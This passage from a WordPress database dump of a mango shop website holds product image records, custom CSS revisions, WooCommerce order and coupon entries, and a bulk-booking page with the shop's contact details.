05:25:46','','02','','inherit','closed','closed','','02-2','','','2022-03-04 10:57:23','2022-03-04 05:27:23','',0,'https://mangomitra.in/wp-content/uploads/2022/03/02.png',0,'attachment','image/png',0),(1101,21,'2022-03-04 11:00:32','2022-03-04 05:30:32','','Kissan mango jam','','inherit','closed','closed','','kissan-mango-jam','','','2022-03-04 11:01:16','2022-03-04 05:31:16','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Kissan-mango-jam.jpg',0,'attachment','image/jpeg',0),(1104,21,'2022-03-04 11:06:32','2022-03-04 05:36:32','','frooti 600ml','','inherit','closed','closed','','frooti-600ml','','','2022-03-04 11:06:32','2022-03-04 05:36:32','',0,'https://mangomitra.in/wp-content/uploads/2022/03/frooti-600ml.jpg',0,'attachment','image/jpeg',0),(1106,21,'2022-03-04 11:07:53','2022-03-04 05:37:53','','600ml','','inherit','closed','closed','','600ml','','','2022-03-04 11:08:11','2022-03-04 05:38:11','',0,'https://mangomitra.in/wp-content/uploads/2022/03/600ml.jpg',0,'attachment','image/jpeg',0),(1108,21,'2022-03-04 11:10:43','2022-03-04 05:40:43','','2l','','inherit','closed','closed','','2l','','','2022-03-04 11:11:02','2022-03-04 05:41:02','',0,'https://mangomitra.in/wp-content/uploads/2022/03/2l.jpg',0,'attachment','image/jpeg',0),(1110,21,'2022-03-04 11:15:32','2022-03-04 05:45:32','','paper 1L','','inherit','closed','closed','','paper-1l','','','2022-03-04 11:16:39','2022-03-04 05:46:39','',0,'https://mangomitra.in/wp-content/uploads/2022/03/paper-1L.jpg',0,'attachment','image/jpeg',0),(1112,21,'2022-03-04 11:20:05','2022-03-04 05:50:05','','16','','inherit','closed','closed','','16-2','','','2022-03-11 17:25:11','2022-03-11 11:55:11','',0,'https://mangomitra.in/wp-content/uploads/2022/03/16.png',0,'attachment','image/png',0),(1113,21,'2022-03-04 11:21:58','2022-03-04 05:51:58','','05','','inherit','closed','closed','','05-2','','','2022-03-16 16:20:40','2022-03-16 10:50:40','',0,'https://mangomitra.in/wp-content/uploads/2022/03/05.png',0,'attachment','image/png',0),(1115,21,'2022-03-04 11:23:35','2022-03-04 05:53:35','','slice 1.2L','','inherit','closed','closed','','slice-1-2l','','','2022-03-04 11:24:34','2022-03-04 05:54:34','',0,'https://mangomitra.in/wp-content/uploads/2022/03/slice-1.2L.jpg',0,'attachment','image/jpeg',0),(1118,21,'2022-03-04 11:26:17','2022-03-04 05:56:17','','Totapuri_mango1','','inherit','closed','closed','','totapuri_mango1','','','2022-03-04 11:29:22','2022-03-04 05:59:22','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Totapuri_mango1.jpg',0,'attachment','image/jpeg',0),(1121,21,'2022-03-04 11:30:12','2022-03-04 06:00:12','','11','','inherit','closed','closed','','11-5','','','2022-03-04 11:32:30','2022-03-04 06:02:30','',0,'https://mangomitra.in/wp-content/uploads/2022/03/11.png',0,'attachment','image/png',0),(1124,21,'2022-03-04 11:34:02','2022-03-04 06:04:02','','03','','inherit','closed','closed','','03-2','','','2022-03-04 11:35:49','2022-03-04 06:05:49','',0,'https://mangomitra.in/wp-content/uploads/2022/03/03.png',0,'attachment','image/png',0),(1127,21,'2022-03-04 11:41:54','2022-03-04 06:11:54','','04','','inherit','closed','closed','','04-2','','','2022-03-04 11:45:11','2022-03-04 06:15:11','',0,'https://mangomitra.in/wp-content/uploads/2022/03/04.png',0,'attachment','image/png',0),(1130,21,'2022-03-04 11:50:02','2022-03-04 06:20:02','','raspuri-mango-pulp-1540987588-1411702','','inherit','closed','closed','','raspuri-mango-pulp-1540987588-1411702','','','2022-03-04 12:29:52','2022-03-04 06:59:52','',0,'https://mangomitra.in/wp-content/uploads/2022/03/raspuri-mango-pulp-1540987588-1411702.jpg',0,'attachment','image/jpeg',0),(1133,21,'2022-03-04 11:53:20','2022-03-04 06:23:20','','31ZXzqC8K7L','','inherit','closed','closed','','31zxzqc8k7l','','','2022-03-04 11:54:22','2022-03-04 06:24:22','',0,'https://mangomitra.in/wp-content/uploads/2022/03/31ZXzqC8K7L.jpg',0,'attachment','image/jpeg',0),(1136,21,'2022-03-04 11:56:21','2022-03-04 06:26:21','','malgova-mango-500x500','','inherit','closed','closed','','malgova-mango-500x500','','','2022-03-16 16:31:00','2022-03-16 11:01:00','',0,'https://mangomitra.in/wp-content/uploads/2022/03/malgova-mango-500x500-1.png',0,'attachment','image/png',0),(1139,21,'2022-03-04 12:06:40','2022-03-04 06:36:40','','images','','inherit','closed','closed','','images-3','','','2022-03-04 12:07:55','2022-03-04 06:37:55','',0,'https://mangomitra.in/wp-content/uploads/2022/03/images.jpg',0,'attachment','image/jpeg',0),(1142,21,'2022-03-04 12:09:38','2022-03-04 06:39:38','','premium-imam-pasand-himayat-mangoes','','inherit','closed','closed','','premium-imam-pasand-himayat-mangoes','','','2022-03-04 12:10:51','2022-03-04 06:40:51','',0,'https://mangomitra.in/wp-content/uploads/2022/03/premium-imam-pasand-himayat-mangoes.jpg',0,'attachment','image/jpeg',0),(1148,1,'2022-03-04 12:34:15','2022-03-04 07:04:15','','raspuri-mango-pulp-1540987588-1411702','','inherit','closed','closed','','raspuri-mango-pulp-1540987588-1411702-2','','','2022-03-04 12:52:14','2022-03-04 07:22:14','',0,'https://mangomitra.in/wp-content/uploads/2022/03/raspuri-mango-pulp-1540987588-1411702-1.jpg',0,'attachment','image/jpeg',0),(1149,1,'2022-03-04 12:39:16','2022-03-04 07:09:16','','avakaya pckle mngo1','','inherit','closed','closed','','avakaya-pckle-mngo1','','','2022-03-04 12:39:22','2022-03-04 07:09:22','',0,'https://mangomitra.in/wp-content/uploads/2022/03/avakaya-pckle-mngo1.jpg',0,'attachment','image/jpeg',0),(1150,1,'2022-03-04 12:41:42','2022-03-04 07:11:42','','devgad alphonso1','','inherit','closed','closed','','devgad-alphonso1-2','','','2022-03-04 12:41:42','2022-03-04 07:11:42','',0,'https://mangomitra.in/wp-content/uploads/2022/03/devgad-alphonso1-1.jpeg',0,'attachment','image/jpeg',0),(1151,1,'2022-03-04 12:42:55','2022-03-04 07:12:55','','devgad alphonso1','','inherit','closed','closed','','devgad-alphonso1-3','','','2022-03-04 12:43:03','2022-03-04 07:13:03','',0,'https://mangomitra.in/wp-content/uploads/2022/03/devgad-alphonso1-2.jpeg',0,'attachment','image/jpeg',0),(1152,1,'2022-03-04 12:44:31','2022-03-04 07:14:31','','devgad 2','','inherit','closed','closed','','devgad-2','','','2022-03-04 12:44:46','2022-03-04 07:14:46','',0,'https://mangomitra.in/wp-content/uploads/2022/03/devgad-2.jpg',0,'attachment','image/jpeg',0),(1153,1,'2022-03-04 12:46:24','2022-03-04 07:16:24','','devgad 23','','inherit','closed','closed','','devgad-23','','','2022-03-04 12:47:06','2022-03-04 07:17:06','',0,'https://mangomitra.in/wp-content/uploads/2022/03/devgad-23.jpg',0,'attachment','image/jpeg',0),(1154,1,'2022-03-04 12:49:11','2022-03-04 07:19:11','','2','','inherit','closed','closed','','2','','','2022-03-04 12:50:58','2022-03-04 07:20:58','',0,'https://mangomitra.in/wp-content/uploads/2022/03/2.jpg',0,'attachment','image/jpeg',0),(1155,1,'2022-03-04 12:54:38','2022-03-04 07:24:38','','8','','inherit','closed','closed','','8','','','2022-03-04 12:55:40','2022-03-04 07:25:40','',0,'https://mangomitra.in/wp-content/uploads/2022/03/8.jpg',0,'attachment','image/jpeg',0),(1156,1,'2022-03-04 13:02:53','2022-03-04 07:32:53','','1643623622pk_540_sweet-mango-rajasthan_02','','inherit','closed','closed','','1643623622pk_540_sweet-mango-rajasthan_02','','','2022-03-04 13:15:16','2022-03-04 07:45:16','',0,'https://mangomitra.in/wp-content/uploads/2022/03/1643623622pk_540_sweet-mango-rajasthan_02.png',0,'attachment','image/png',0),(1158,21,'2022-03-04 13:04:52','2022-03-04 07:34:52','','1643623049pk_540_27oct21_mango_solapur_02','','inherit','closed','closed','','1643623049pk_540_27oct21_mango_solapur_02','','','2022-03-04 13:05:25','2022-03-04 07:35:25','',0,'https://mangomitra.in/wp-content/uploads/2022/03/1643623049pk_540_27oct21_mango_solapur_02.png',0,'attachment','image/png',0),(1160,21,'2022-03-04 13:06:50','2022-03-04 07:36:50','','1643623049mango_up_style','','inherit','closed','closed','','1643623049mango_up_style','','','2022-03-04 13:07:01','2022-03-04 07:37:01','',0,'https://mangomitra.in/wp-content/uploads/2022/03/1643623049mango_up_style.png',0,'attachment','image/png',0),(1162,21,'2022-03-04 13:07:46','2022-03-04 07:37:46','','1643622711mango_hing_up_style','','inherit','closed','closed','','1643622711mango_hing_up_style','','','2022-03-04 13:08:04','2022-03-04 07:38:04','',0,'https://mangomitra.in/wp-content/uploads/2022/03/1643622711mango_hing_up_style.png',0,'attachment','image/png',0),(1164,21,'2022-03-04 13:08:55','2022-03-04 07:38:55','','chhunda_or_gujarati_sweet_mango','','inherit','closed','closed','','chhunda_or_gujarati_sweet_mango','','','2022-03-04 13:09:06','2022-03-04 07:39:06','',0,'https://mangomitra.in/wp-content/uploads/2022/03/chhunda_or_gujarati_sweet_mango.png',0,'attachment','image/png',0),(1166,21,'2022-03-04 13:10:30','2022-03-04 07:40:30','','mango_cut-removebg-preview','','inherit','closed','closed','','mango_cut-removebg-preview','','','2022-03-04 13:10:48','2022-03-04 07:40:48','',0,'https://mangomitra.in/wp-content/uploads/2022/03/mango_cut-removebg-preview.png',0,'attachment','image/png',0),(1168,21,'2022-03-04 13:12:00','2022-03-04 07:42:00','','mango_thokku-removebg-preview','','inherit','closed','closed','','mango_thokku-removebg-preview','','','2022-03-04 13:12:15','2022-03-04 07:42:15','',0,'https://mangomitra.in/wp-content/uploads/2022/03/mango_thokku-removebg-preview.png',0,'attachment','image/png',0),(1172,1,'2022-03-04 17:38:38','2022-03-04 12:08:38','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #FFFE71;\n}\n#page {\n	background-color: #D5EBC1;\n}\n#site-header {	\n	background:#c7f6b6;\n}\nheader {\n    background: #fff;\n}\n\n.below-header-bar {\n    height: 62px;\n}\n\n.top-header {\n    border-bottom: solid;\n    border-bottom-width: 0px;\n}\n\n.top-header, .main-header, .below-header {\n    position: relative;\n}\n\n.top-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #c7f6b6;\n}\n\n.top-header .top-header-bar {\n    line-height: 45px;\n}\n\n/*below header special css*/\n.below-header-col1 {\n    float: left;\n    width: 21%;\n}\n\n.below-header-col3 {\n    float: left;\n    width: 22%;\n}\n\n.below-header-col2 {\n    width: 57%;\n    float: left;\n    text-align: center;\n}\n\n.main-header:before, .below-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #43693F;\n}\n.top-footer:before, .below-footer:before, .widget-footer:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #43693F;\n} #D5EBC1;\n}\n//#96ff00\n//#FFDF00','open-shop','','publish','closed','closed','','open-shop','','','2022-10-20 18:05:25','2022-10-20 12:35:25','',0,'https://mangomitra.in/2022/03/04/open-shop/',0,'custom_css','',0),(1173,1,'2022-03-04 17:38:38','2022-03-04 12:08:38','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #96ff00;\n}\n#page {\n	background-color: #96ff00;\n}','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-03-04 17:38:38','2022-03-04 12:08:38','',1172,'https://mangomitra.in/?p=1173',0,'revision','',0),(1175,1,'2022-03-04 17:49:19','2022-03-04 12:19:19','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #96ff00;\n}\n#page {\n	background-color: #96ff00;\n}\n#header {\n    background: #96ff00;\n}','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-03-04 17:49:19','2022-03-04 12:19:19','',1172,'https://mangomitra.in/?p=1175',0,'revision','',0),(1177,1,'2022-03-04 17:49:31','2022-03-04 12:19:31','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #96ff00;\n}\n#page {\n	background-color: #96ff00;\n}\n.header {\n    background: #96ff00;\n}','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-03-04 17:49:31','2022-03-04 12:19:31','',1172,'https://mangomitra.in/?p=1177',0,'revision','',0),(1179,1,'2022-03-04 17:51:24','2022-03-04 12:21:24','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #96ff00;\n}\n#page {\n	background-color: #96ff00;\n}\n.header {\n    background: #96ff00;\n}\n.ast-primary-header-bar{\n	background-color:#96ff00;\n}\n.ast-primary-header-bar{\n	background-color: #336699;\n}\n#ast-desktop-header .main-header-menu > .menu-item > .menu-link{\n	color: #96ff00;\n}','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-03-04 17:51:24','2022-03-04 12:21:24','',1172,'https://mangomitra.in/?p=1179',0,'revision','',0),(1181,1,'2022-03-04 17:52:56','2022-03-04 12:22:56','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #96ff00;\n}\n#page {\n	background-color: #96ff00;\n}\n#site-header {	\n	background: #96ff00;\n}','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-03-04 17:52:56','2022-03-04 12:22:56','',1172,'https://mangomitra.in/?p=1181',0,'revision','',0),(1183,1,'2022-03-04 17:53:35','2022-03-04 12:23:35','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #96ff00;\n}\n#page {\n	background-color: #96ff00;\n}\n#site-header {	\n	background: #96ff00;\n}\n.header-class-name {\nbackground-color: red;\n}','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-03-04 17:53:35','2022-03-04 12:23:35','',1172,'https://mangomitra.in/?p=1183',0,'revision','',0),(1185,1,'2022-03-04 17:58:05','2022-03-04 12:28:05','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #96ff00;\n}\n#page {\n	background-color: #96ff00;\n}\n#site-header {	\n	background: #96ff00;\n}\nheader {\n    background: #fff;\n}\n\n.below-header-bar {\n    height: 62px;\n}\n\n.top-header {\n    border-bottom: solid;\n    border-bottom-width: 0px;\n}\n\n.top-header, .main-header, .below-header {\n    position: relative;\n}\n\n.top-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #96ff00;\n}\n\n.top-header .top-header-bar {\n    line-height: 45px;\n}\n\n/*below header special css*/\n.below-header-col1 {\n    float: left;\n    width: 21%;\n}\n\n.below-header-col3 {\n    float: left;\n    width: 22%;\n}\n\n.below-header-col2 {\n    width: 57%;\n    float: left;\n    text-align: center;\n}\n\n.main-header:before, .below-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #96ff00;\n}\n','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-03-04 17:58:05','2022-03-04 12:28:05','',1172,'https://mangomitra.in/?p=1185',0,'revision','',0),(1187,1,'2022-03-07 10:07:49','2022-03-07 04:37:49','','121','','inherit','closed','closed','','121','','','2022-03-07 10:08:01','2022-03-07 04:38:01','',0,'https://mangomitra.in/wp-content/uploads/2022/03/121.png',0,'attachment','image/png',0),(1188,1,'2022-03-07 10:09:55','2022-03-07 04:39:55','','images','','inherit','closed','closed','','images-4','','','2022-03-07 10:10:39','2022-03-07 04:40:39','',0,'https://mangomitra.in/wp-content/uploads/2022/03/images-1.jpg',0,'attachment','image/jpeg',0),(1190,1,'2022-03-07 11:39:50','2022-03-07 06:09:50','','banner [Recovered]-01','','inherit','closed','closed','','banner-recovered-01-3','','','2022-03-07 11:39:50','2022-03-07 06:09:50','',0,'https://mangomitra.in/wp-content/uploads/2022/03/banner-Recovered-01.png',0,'attachment','image/png',0),(1192,1,'2022-03-07 11:40:31','2022-03-07 06:10:31','','banner [Recovered]-04 (1)','','inherit','closed','closed','','banner-recovered-04-1','','','2022-03-07 11:40:31','2022-03-07 06:10:31','',0,'https://mangomitra.in/wp-content/uploads/2022/03/banner-Recovered-04-1.png',0,'attachment','image/png',0),(1193,25,'2022-03-07 11:43:18','2022-03-07 06:13:18','','mangoes','','inherit','closed','closed','','mangoes-3','','','2022-03-07 15:35:06','2022-03-07 10:05:06','',0,'https://mangomitra.in/wp-content/uploads/2022/03/mangoes-2.jpg',0,'attachment','image/jpeg',0),(1195,1,'2022-03-07 11:54:06','2022-03-07 06:24:06','','Order &ndash; March 7, 2022 @ 11:54 AM','','wc-completed','open','closed','wc_order_QLaHo22uB8umu','order-mar-07-2022-0624-am','','','2022-03-07 12:00:18','2022-03-07 06:30:18','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1195',0,'shop_order','',7),(1196,1,'2022-03-07 12:36:45','2022-03-07 07:06:45','','Order &ndash; March 7, 2022 @ 12:36 PM','','wc-processing','open','closed','wc_order_r3wM4Rjwr5rWR','order-mar-07-2022-0706-am','','','2022-03-07 12:37:11','2022-03-07 07:07:11','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1196',0,'shop_order','',3),(1197,1,'2022-03-07 12:48:14','2022-03-07 07:18:14','','Order &ndash; March 7, 2022 @ 12:48 PM','','wc-processing','open','closed','wc_order_8KWM98KPioFK3','order-mar-07-2022-0718-am','','','2022-03-07 12:48:35','2022-03-07 07:18:35','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1197',0,'shop_order','',3),(1198,1,'2022-03-07 12:50:37','2022-03-07 07:20:37','','Order &ndash; March 7, 2022 @ 12:50 PM','','wc-processing','open','closed','wc_order_dN6vgheS9ZxCW','order-mar-07-2022-0720-am','','','2022-03-07 12:50:55','2022-03-07 07:20:55','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1198',0,'shop_order','',3),(1199,1,'2022-03-07 12:53:04','2022-03-07 07:23:04','','Order &ndash; March 7, 2022 @ 12:53 PM','','wc-processing','open','closed','wc_order_6uJFdYWpcQo3x','order-mar-07-2022-0723-am','','','2022-03-07 12:53:18','2022-03-07 07:23:18','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1199',0,'shop_order','',3),(1200,1,'2022-03-07 13:04:47','2022-03-07 07:34:47','','Order &ndash; March 7, 2022 @ 01:04 PM','','wc-processing','open','closed','wc_order_3NTW8pGkAmPa6','order-mar-07-2022-0734-am','','','2022-03-07 13:05:01','2022-03-07 07:35:01','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1200',0,'shop_order','',4),(1201,1,'2022-03-07 15:04:34','2022-03-07 09:34:34','','Order &ndash; March 7, 2022 @ 03:04 PM','','wc-processing','open','closed','wc_order_594oCWQX1EAhs','order-mar-07-2022-0934-am','','','2022-03-07 15:04:52','2022-03-07 09:34:52','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1201',0,'shop_order','',5),(1202,1,'2022-03-07 15:45:25','2022-03-07 10:15:25','','Order &ndash; March 7, 2022 @ 03:45 PM','','wc-cancelled','open','closed','wc_order_uBJmJN1aIVtUI','order-mar-07-2022-1015-am','','','2022-10-11 03:27:58','2022-10-10 21:57:58','',0,'https://mangomitra.in/?post_type=shop_order&#038;p=1202',0,'shop_order','',4),(1203,1,'2022-03-07 16:37:36','0000-00-00 00:00:00','<!-- wp:media-text -->\n<div class=\"wp-block-media-text alignwide is-stacked-on-mobile\"><figure class=\"wp-block-media-text__media\"></figure><div class=\"wp-block-media-text__content\"><!-- wp:paragraph {\"placeholder\":\"Content…\",\"fontSize\":\"large\"} -->\n<p class=\"has-large-font-size\"></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:media-text -->','','','draft','closed','closed','','','','','2022-03-07 16:37:36','2022-03-07 11:07:36','',0,'https://mangomitra.in/?page_id=1203',0,'page','',0),(1204,1,'2022-03-09 12:33:59','2022-03-09 07:03:59','<!-- wp:heading {\"level\":3} -->\n<h3>Send your bulk order details now &amp; we will get back to you shortly!</h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Download bulk booking form, fill the details and send it to mango@homedirect.in</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For more details please contact (+91)7259272171</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":1290,\"href\":\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\"} -->\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-c9a85655-b063-44b4-a7f7-4cd279eb908d\" href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\">bulk_booking_form</a><a href=\"https://mangomitra.in/wp-content/uploads/2022/03/bulk_booking_form-1.xlsx\" class=\"wp-block-file__button\" download aria-describedby=\"wp-block-file--media-c9a85655-b063-44b4-a7f7-4cd279eb908d\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','Bulk Booking','','publish','closed','closed','','bulk-booking','','','2022-03-16 17:36:53','2022-03-16 12:06:53','',0,'https://mangomitra.in/?page_id=1204',0,'page','',0),(1207,1,'2022-03-07 17:58:33','2022-03-07 12:28:33','','logo-01','','inherit','closed','closed','','logo-01','','','2022-03-07 17:58:33','2022-03-07 12:28:33','',0,'https://mangomitra.in/wp-content/uploads/2022/03/logo-01.png',0,'attachment','image/png',0),(1210,1,'2022-03-07 18:02:31','2022-03-07 12:32:31','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #FFDF00;\n}\n#page {\n	background-color: #FFDF00;\n}\n#site-header {	\n	background: #FFDF00;\n}\nheader {\n    background: #fff;\n}\n\n.below-header-bar {\n    height: 62px;\n}\n\n.top-header {\n    border-bottom: solid;\n    border-bottom-width: 0px;\n}\n\n.top-header, .main-header, .below-header {\n    position: relative;\n}\n\n.top-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #FFDF00;\n}\n\n.top-header .top-header-bar {\n    line-height: 45px;\n}\n\n/*below header special css*/\n.below-header-col1 {\n    float: left;\n    width: 21%;\n}\n\n.below-header-col3 {\n    float: left;\n    width: 22%;\n}\n\n.below-header-col2 {\n    width: 57%;\n    float: left;\n    text-align: center;\n}\n\n.main-header:before, .below-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #FFDF00;\n}\n//#96ff00','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-03-07 18:02:31','2022-03-07 12:32:31','',1172,'https://mangomitra.in/?p=1210',0,'revision','',0),(1212,1,'2022-03-07 18:26:13','2022-03-07 12:56:13','','l 2-01','','inherit','closed','closed','','l-2-01','','','2022-03-07 18:26:13','2022-03-07 12:56:13','',0,'https://mangomitra.in/wp-content/uploads/2022/03/l-2-01.png',0,'attachment','image/png',0),(1215,1,'2022-03-08 11:05:41','2022-03-08 05:35:41','','l3-01','','inherit','closed','closed','','l3-01','','','2022-03-08 11:05:41','2022-03-08 05:35:41','',0,'https://mangomitra.in/wp-content/uploads/2022/03/l3-01.png',0,'attachment','image/png',0),(1216,1,'2022-03-08 11:06:29','2022-03-08 05:36:29','https://mangomitra.in/wp-content/uploads/2022/03/cropped-l3-01.png','cropped-l3-01.png','','inherit','closed','closed','','cropped-l3-01-png','','','2022-03-08 11:06:29','2022-03-08 05:36:29','',0,'https://mangomitra.in/wp-content/uploads/2022/03/cropped-l3-01.png',0,'attachment','image/png',0),(1220,1,'2022-03-08 11:43:12','2022-03-08 06:13:12','','Artboard 4-8 (1)','','inherit','closed','closed','','artboard-4-8-1','','','2022-03-08 11:43:12','2022-03-08 06:13:12','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Artboard-4-8-1.png',0,'attachment','image/png',0),(1221,1,'2022-03-08 11:43:55','2022-03-08 06:13:55','','Artboard 2-8 (1)','','inherit','closed','closed','','artboard-2-8-1-2','','','2022-03-08 11:43:55','2022-03-08 06:13:55','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Artboard-2-8-1.png',0,'attachment','image/png',0),(1222,1,'2022-03-08 11:44:24','2022-03-08 06:14:24','','Artboard 3-8','','inherit','closed','closed','','artboard-3-8-2','','','2022-03-08 11:44:24','2022-03-08 06:14:24','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Artboard-3-8.png',0,'attachment','image/png',0),(1223,1,'2022-03-08 11:44:43','2022-03-08 06:14:43','','Artboard 1-8','','inherit','closed','closed','','artboard-1-8-2','','','2022-03-08 11:44:43','2022-03-08 06:14:43','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Artboard-1-8.png',0,'attachment','image/png',0),(1224,1,'2022-03-08 16:12:39','2022-03-08 10:42:39','','Untitled-2','','inherit','closed','closed','','untitled-2','','','2022-03-08 16:12:39','2022-03-08 10:42:39','',0,'https://mangomitra.in/wp-content/uploads/2022/03/Untitled-2.png',0,'attachment','image/png',0),(1227,1,'2022-03-08 16:43:36','2022-03-08 11:13:36','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #FFFD74;\n}\n#page {\n	background-color: #FFFD74;\n}\n#site-header {	\n	background: #FFFD74;\n}\nheader {\n    background: #fff;\n}\n\n.below-header-bar {\n    height: 62px;\n}\n\n.top-header {\n    border-bottom: solid;\n    border-bottom-width: 0px;\n}\n\n.top-header, .main-header, .below-header {\n    position: relative;\n}\n\n.top-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #FFFD74;\n}\n\n.top-header .top-header-bar {\n    line-height: 45px;\n}\n\n/*below header special css*/\n.below-header-col1 {\n    float: left;\n    width: 21%;\n}\n\n.below-header-col3 {\n    float: left;\n    width: 22%;\n}\n\n.below-header-col2 {\n    width: 57%;\n    float: left;\n    text-align: center;\n}\n\n.main-header:before, .below-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #FFFD74;\n}\n//#96ff00\n//#FFDF00','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-03-08 16:43:36','2022-03-08 11:13:36','',1172,'https://mangomitra.in/?p=1227',0,'revision','',0),(1229,1,'2022-03-08 16:46:15','2022-03-08 11:16:15','.site-content {background-color: #96ff00;}\n.site-inner {\n	background-color: #FFFE71;\n}\n#page {\n	background-color: #FFFE71;\n}\n#site-header {	\n	background: #FFFD74;\n}\nheader {\n    background: #fff;\n}\n\n.below-header-bar {\n    height: 62px;\n}\n\n.top-header {\n    border-bottom: solid;\n    border-bottom-width: 0px;\n}\n\n.top-header, .main-header, .below-header {\n    position: relative;\n}\n\n.top-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #FFFD74;\n}\n\n.top-header .top-header-bar {\n    line-height: 45px;\n}\n\n/*below header special css*/\n.below-header-col1 {\n    float: left;\n    width: 21%;\n}\n\n.below-header-col3 {\n    float: left;\n    width: 22%;\n}\n\n.below-header-col2 {\n    width: 57%;\n    float: left;\n    text-align: center;\n}\n\n.main-header:before, .below-header:before {\n    content: \"\";\n    position: absolute;\n    top: 0;\n    left: 0;\n    width: 100%;\n    height: 100%;\n    background: #FFFE71;\n}\n//#96ff00\n//#FFDF00','open-shop','','inherit','closed','closed','','1172-revision-v1','','','2022-03-08 16:46:15','2022-03-08 11:16:15','',1172,'https://mangomitra.in/?p=1229',0,'revision','',0),(1230,1,'2022-03-08 17:01:27','2022-03-08 11:31:27','','ACAX33ZS','','publish','closed','closed','','acax33zs','','','2022-03-09 14:17:24','2022-03-09 08:47:24','',0,'https://mangomitra.in/?post_type=shop_coupon&#038;p=1230',0,'shop_coupon','',0),(1231,1,'2022-03-08 17:06:20','2022-03-08 11:36:20','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[woocommerce_checkout]\n<!-- /wp:shortcode -->','Checkout','','inherit','closed','closed','','10-revision-v1','','','2022-03-08 17:06:20','2022-03-08 11:36:20','',10,'https://mangomitra.in/?p=1231',0,'revision','',0),(1232,25,'2022-03-08 17:11:31','2022-03-08 11:41:31','','8','','inherit','closed','closed','','8-2','','','2022-03-15 14:35:49','2022-03-15 09:05:49','',0,'https://mangomitra.in/wp-content/uploads/2022/03/8-1.jpg',0,'attachment','image/jpeg',0),(1234,1,'2022-03-09 12:20:52','2022-03-09 06:50:52','{\"fields\":{\"1\":{\"id\":\"1\",\"type\":\"name\",\"label\":\"Name\",\"format\":\"first-last\",\"description\":\"\",\"required\":\"1\",\"size\":\"medium\",\"simple_placeholder\":\"\",\"simple_default\":\"\",\"first_placeholder\":\"\",\"first_default\":\"\",\"middle_placeholder\":\"\",\"middle_default\":\"\",\"last_placeholder\":\"\",\"last_default\":\"\",\"css\":\"\"},\"8\":{\"id\":\"8\",\"type\":\"text\",\"label\":\"Place\",\"description\":\"\",\"size\":\"medium\",\"placeholder\":\"\",\"limit_count\":\"1\",\"limit_mode\":\"characters\",\"default_value\":\"\",\"input_mask\":\"\",\"css\":\"\"},\"9\":{\"id\":\"9\",\"type\":\"text\",\"label\":\"Mobile 